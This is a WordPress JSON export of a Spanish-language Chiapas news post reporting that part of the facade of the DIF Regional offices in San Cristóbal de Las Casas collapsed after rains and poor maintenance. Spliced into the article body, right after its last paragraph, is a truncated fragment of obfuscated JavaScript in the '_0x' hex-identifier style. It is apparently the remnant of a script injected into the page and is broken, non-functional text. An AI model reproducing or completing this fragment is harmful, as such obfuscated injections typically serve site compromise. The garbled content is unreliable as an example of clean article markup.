{"id":5100,"date":"2022-09-14T03:42:19","date_gmt":"2022-09-14T03:42:19","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5100"},"modified":"2022-09-14T03:42:20","modified_gmt":"2022-09-14T03:42:20","slug":"cae-parte-de-la-fachada-de-las-oficinas-del-dif-regional","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5100","title":{"rendered":"Cae parte de la fachada de las oficinas del DIF regional"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.19.04-PM-2-1024x768.jpeg\" alt=\"\" class=\"wp-image-5101\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.19.04-PM-2-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.19.04-PM-2-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.19.04-PM-2-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.19.04-PM-2-1536x1152.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.19.04-PM-2.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><div> \u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Derivado de las lluvias que se han presentado en San Crist\u00f3bal, por lo engorroso que es el tr\u00e1mite en Instituto Nacional de Antropolog\u00eda e Historia (INAH), y la falta de mantenimiento que le han dado a la fachada de lo que funciona como las instalaciones del DIF Regional, cay\u00f3 una gran parte alrededor de las 3 de la madrugada de este mi\u00e9rcoles. Se supo que el inmueble es propiedad de la Familia Pedrero de San Crist\u00f3bal, sin embargo desde hace varios a\u00f1os ha sido ocupado por el DIF Regional, y ante las dificultades que pone el INAH para remodelaciones o correcciones en fachadas, no lo han podido hacer, y ante la humedad por lluvias, se vino abajo, un aproximado de 4 metros por 1.5 de repello de la fachada, quedando al descubierto el adobe. Hasta las 12 del d\u00eda de este martes, solamente hab\u00eda sido delimitado con cintas de pl\u00e1stico, y continuaba tirado restos de ladrillo y cal que es usado en acabados autorizados por el INAH en fachadas consideradas dentro de monumentos hist\u00f3ricos. Algunos propietarios de locales comerciales, vecinos del lugar, argumentaron que de a\u00f1os atr\u00e1s, el inmueble hab\u00eda presentado \u201ccuarteaduras\u201d, y que ignoran qui\u00e9n, pero solo fue parchado con yeso y pintado de blanco, sin embargo es notoria las malas condiciones en que se encuentra, ya que incluso existe maleza en la parte alta del edificio.<\/div><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Derivado de las lluvias que se han presentado en San Crist\u00f3bal, por lo engorroso que es el tr\u00e1mite en Instituto Nacional de Antropolog\u00eda e Historia (INAH), y la falta de mantenimiento que le han dado a la fachada de lo que funciona como las instalaciones del DIF Regional, cay\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5101,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5100","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5100","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5100"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5100\/revisions"}],"predecessor-version":[{"id":5102,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5100\/revisions\/5102"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5101"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5100"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5100"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5100"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}